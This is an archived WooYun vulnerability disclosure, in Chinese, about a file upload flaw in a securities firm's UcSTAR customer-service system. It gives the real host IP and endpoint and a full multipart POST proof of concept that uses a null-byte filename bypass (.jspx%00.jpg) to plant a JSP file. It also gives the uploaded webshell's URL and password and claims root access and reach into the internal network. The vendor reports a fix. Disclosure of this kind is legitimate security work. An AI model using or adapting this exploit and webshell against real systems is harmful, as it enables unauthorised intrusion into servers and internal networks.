乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-06: 细节已通知厂商并且等待厂商处理中 2015-07-08: 厂商已经确认,细节仅向厂商公开 2015-07-18: 细节向核心白帽子及相关领域专家公开 2015-07-28: 细节向普通白帽子公开 2015-08-07: 细节向实习白帽子公开 2015-08-22: 细节向公众公开
任意文件上传漏洞,可威胁内网,求高rank
安信证劵客服系统UcSTAR客服系统 地址:http://119.147.80.161:8002
虽然登录页被处理了,但上传漏洞仍然存在http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp
通过抓包改包,我们得到poc
POST http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://119.147.80.161:8002/webcall_chat/leaveMessage.jspAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7df190111008b2Accept-Encoding: gzip, deflateHost: 119.147.80.161:8002Content-Length: 2929Connection: Keep-AlivePragma: no-cacheCookie: XSESSIONID=o4d30tsagvtr-----------------------------7df190111008b2Content-Disposition: form-data; name="save"save-----------------------------7df190111008b2Content-Disposition: form-data; name="domainUri"null-----------------------------7df190111008b2Content-Disposition: form-data; name="remoteip"-----------------------------7df190111008b2Content-Disposition: form-data; name="userUri"-----------------------------7df190111008b2Content-Disposition: form-data; name="seatId"-----------------------------7df190111008b2Content-Disposition: form-data; name="seatType"0-----------------------------7df190111008b2Content-Disposition: form-data; name="signId"-----------------------------7df190111008b2Content-Disposition: form-data; name="messageid"-----------------------------7df190111008b2Content-Disposition: form-data; name="messageType"1-----------------------------7df190111008b2Content-Disposition: form-data; name="chatid"41413-----------------------------7df190111008b2Content-Disposition: form-data; name="userName"ts-----------------------------7df190111008b2Content-Disposition: form-data; name="phone1"13766666616-----------------------------7df190111008b2Content-Disposition: form-data; name="phone2"-----------------------------7df190111008b2Content-Disposition: form-data; name="phone"13766666616-----------------------------7df190111008b2Content-Disposition: form-data; name="email"-----------------------------7df190111008b2Content-Disposition: form-data; name="revertTypes"电话-----------------------------7df190111008b2Content-Disposition: form-data; name="revertType"电话-----------------------------7df190111008b2Content-Disposition: form-data; name="memo"ts-----------------------------7df190111008b2Content-Disposition: form-data; name="file1"; filename="987.jspx%00.jpg"Content-Type: image/pjpegwooyuntest-----------------------------7df190111008b2--
注意这里filename="987.jspx%00.jpg,需要把"%00" URL-decode一下
上传后的一句话地址为:http://119.147.80.161:8002/upload/message/9873.jspx密码:0q23
root权限,可以内网
上传点过滤,求高rank
危害等级:中
漏洞Rank:6
确认时间:2015-07-08 21:04
谢谢,我们已及时修复漏洞。
暂无